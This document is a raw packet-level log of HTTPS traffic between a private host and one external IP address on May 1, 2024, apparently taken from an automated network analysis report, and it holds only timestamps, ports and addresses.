                                                      May 1, 2024 14:55:28.900021076 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.901141882 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.901175976 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.901189089 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.901195049 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.901221037 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.902162075 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.902192116 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.902216911 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.902223110 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.902251005 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.902951956 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.902988911 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.903002977 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.903012037 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.903023005 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.903031111 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.903466940 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.903551102 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.903964043 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.903994083 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.904019117 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.904023886 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.904035091 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.904247999 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.904774904 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.904798985 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.904827118 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.904830933 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.904853106 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.905019999 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.905054092 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.905076981 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.905082941 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.905093908 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.906269073 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.906290054 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.906325102 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.906336069 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.906347990 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.907244921 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.907269955 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.907290936 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.907295942 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.907306910 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.907321930 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.907437086 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.907459974 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.907486916 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.907491922 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.907505035 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.907607079 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.908433914 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.908457994 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.908488035 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.908493996 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.908507109 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.908514023 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.909452915 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.909477949 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.909488916 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.909492970 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.909507990 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.909521103 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.909620047 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.910238981 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.910264969 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.910288095 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.910293102 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.910306931 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.910336018 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.910361052 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.911216974 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.911238909 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.911264896 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.911269903 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.911281109 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.911375046 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.911708117 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.911736012 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.911750078 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.911753893 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.911780119 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.911845922 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.912612915 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.912641048 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.912657976 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.912662029 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.912672043 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.912692070 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.912781954 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.913465023 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.913501978 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.913518906 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.913522959 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.913543940 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.914328098 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.914352894 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.914381981 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.914386988 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.914397001 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.914427996 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.915211916 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.915234089 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.915266037 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.915270090 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.915281057 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.915312052 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.916182995 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.916208029 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.916235924 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.916240931 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.916250944 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.916282892 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.916429043 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.916450977 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.916477919 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.916484118 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.916492939 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.916579962 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.917463064 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.917494059 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.917514086 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.917517900 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.917531967 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.917606115 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.918365002 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.918387890 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.918414116 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.918418884 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.918430090 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.918545008 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.919274092 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.919302940 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.919332981 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.919338942 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.919357061 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.919440031 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.919526100 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.919548988 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.919575930 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.919583082 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.919593096 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.919672966 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.920983076 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.921020985 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.921034098 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.921040058 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.921063900 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.921205997 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.921278000 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.921300888 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.921324968 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.921329975 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.921340942 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.921425104 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.922401905 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.922424078 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.922452927 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.922457933 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.922470093 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.922627926 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.922653913 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.922673941 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.922677994 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.922704935 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.923593044 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.923614025 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.923649073 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.923655987 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.923669100 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.923788071 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.924386024 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.924406052 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.924437046 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.924441099 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.924449921 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.924504042 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.925421000 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.925446987 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.925506115 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.925513029 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.925522089 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.926353931 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.926378965 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.926403046 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.926407099 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.926418066 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.926436901 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.926538944 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.926561117 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.926587105 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.926592112 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.926604033 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.926991940 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.927403927 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.927428007 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.927447081 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.927452087 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.927478075 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.927576065 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.928489923 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.928517103 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.928545952 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.928550959 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.928561926 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.928623915 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.929264069 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.929286957 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.929316998 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.929322004 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.929332972 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.929363012 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.929482937 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.929505110 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.929532051 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.929537058 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.929548979 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.929577112 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.930444956 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.930474043 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.930495977 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.930500984 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.930514097 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.930536985 CEST49167443192.168.2.22172.67.215.45
May 1, 2024 14:55:28.931394100 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.931418896 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.931482077 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.931485891 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.931514978 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.931660891 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.932096958 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.932138920 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.932162046 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.932166100 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.932176113 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.932317019 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.932343960 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.932368994 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.932374001 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.932385921 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.932411909 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.933048964 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.933085918 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.933113098 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.933150053 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.933154106 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.933168888 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.933343887 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.933862925 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.933891058 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.933937073 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.933943987 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.933953047 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.933980942 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.934734106 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.934760094 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.934794903 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.934801102 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.934811115 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.934917927 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.935020924 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.935044050 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.935079098 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.935085058 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.935095072 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.935158014 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.935869932 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.935894012 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.935921907 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.935925961 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.935939074 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.936557055 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.936583996 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.936609983 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.936614990 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.936625004 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.936749935 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.936772108 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.936796904 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.936803102 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.936814070 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.936841965 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.937634945 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.937663078 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.937693119 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.937699080 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.937709093 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.938189983 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.938218117 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.938237906 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.938242912 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.938265085 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.939035892 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.939058065 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.939089060 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.939095020 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.939105988 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.939276934 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.939305067 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.939327002 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.939331055 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.939357996 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.940098047 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.940124035 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.940155029 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.940160036 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.940169096 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.940834045 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.940860987 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.940893888 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.940898895 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.940907955 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.941144943 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.941164970 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.941195011 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.941200972 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.941210985 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.941930056 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.941956997 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.941983938 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.941988945 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.941998005 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.942500114 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.942519903 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.942554951 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.942562103 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.942570925 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.943085909 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.943316936 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.943340063 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.943377972 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.943382978 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.943392038 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.943553925 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.943579912 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.943608046 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.943614960 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.943624020 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.944891930 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.947176933 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.947197914 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.947240114 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.947244883 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.947252989 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.947295904 CEST  49167  443    192.168.2.22   172.67.215.45
May 1, 2024 14:55:28.947572947 CEST  443    49167  172.67.215.45  192.168.2.22
May 1, 2024 14:55:28.947594881 CEST  443    49167  172.67.215.45  192.168.2.22
